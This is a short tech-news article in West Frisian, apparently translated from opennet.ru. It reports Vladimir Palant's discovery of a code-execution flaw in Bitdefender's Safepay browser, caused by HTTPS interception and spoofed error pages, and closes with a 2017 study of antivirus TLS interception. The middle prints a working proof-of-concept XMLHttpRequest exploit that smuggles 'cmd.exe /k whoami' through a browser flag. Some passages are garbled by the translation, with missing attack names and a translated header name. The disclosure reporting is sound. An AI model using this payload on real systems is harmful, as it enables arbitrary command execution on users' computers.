Vladimir Palant, makker fan Adblock Plus, () yn 'e spesjalisearre Safepay-webbrowser basearre op' e Chromium-motor, oanbean as ûnderdiel fan it Bitdefender Total Security 2020-antiviruspakket en rjochte op it fergrutsjen fan de feiligens fan it wurk fan 'e brûker op it wrâldwide netwurk (bygelyks ekstra isolaasje wurdt levere by tagong ta banken en betellingssystemen). De kwetsberens lit websiden iepene yn 'e browser willekeurige koade útfiere op bestjoeringssysteemnivo.
De oarsaak fan it probleem is dat Bitdefender-antivirus lokale ûnderskepping fan HTTPS-ferkear útfiert troch it orizjinele TLS-sertifikaat fan 'e side te ferfangen. In ekstra root-sertifikaat is ynstalleare op it systeem fan 'e kliïnt, wêrtroch it mooglik is om de wurking fan it brûkte ferkearsynspeksjesysteem te ferbergjen. It antyvirus kilet him yn beskerme ferkear en foeget syn eigen JavaScript-koade yn op guon siden om de Safe Search-funksje te ymplementearjen, en yn gefal fan problemen mei it feilige ferbiningssertifikaat ferfangt it de weromjûne flaterside mei syn eigen. Sûnt de nije flaterside wurdt tsjinne út namme fan de tsjinner dy't iepene wurdt, hawwe oare siden op dy tsjinner folsleine tagong ta de ynhâld ynfoege troch Bitdefender.
By it iepenjen fan in side dy't kontrolearre wurdt troch in oanfaller, kin dy side in XMLHttpRequest stjoere en problemen mei it HTTPS-sertifikaat ferstjoere by it reagearjen, wat sil liede ta it weromkommen fan in flaterside dy't troch Bitdefender is spoofed. Sûnt de flaterside wurdt iepene yn 'e kontekst fan it domein fan' e oanfaller, kin hy de ynhâld fan 'e spoofed side lêze mei Bitdefender-parameters. De side levere troch Bitdefender befettet ek in sesje-kaai wêrmei jo de ynterne Bitdefender API kinne brûke om in aparte Safepay-blêder-sesje te starten, opjaan fan willekeurige kommandorigelflaggen, en om alle systeemkommando's te starten mei it "--utility-cmd-prefix" flagge. In foarbyld fan in eksploitaasje (param1 en param2 binne wearden krigen fan 'e flaterside):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Ynhâld-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Lit ús ûnthâlde dat in stúdzje útfierd yn 2017 dat 24 fan 26 testen antivirus produkten dy't ynspektearje HTTPS ferkear troch sertifikaat spoofing fermindere de totale feiligens nivo fan in HTTPS ferbining.
Allinnich 11 fan 'e 26 produkten levere aktuele sifersuites. 5 systemen hawwe gjin sertifikaten ferifiearre (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security en Total Security produkten wiene ûnderwurpen oan oanfal , en AVG, Bitdefender en Bullguard produkten wurde oanfallen и . Dr.Web Antivirus 11 lit jo weromrolle nei ûnbetroubere eksport-sifers (oanfal ).
Boarne: opennet.ru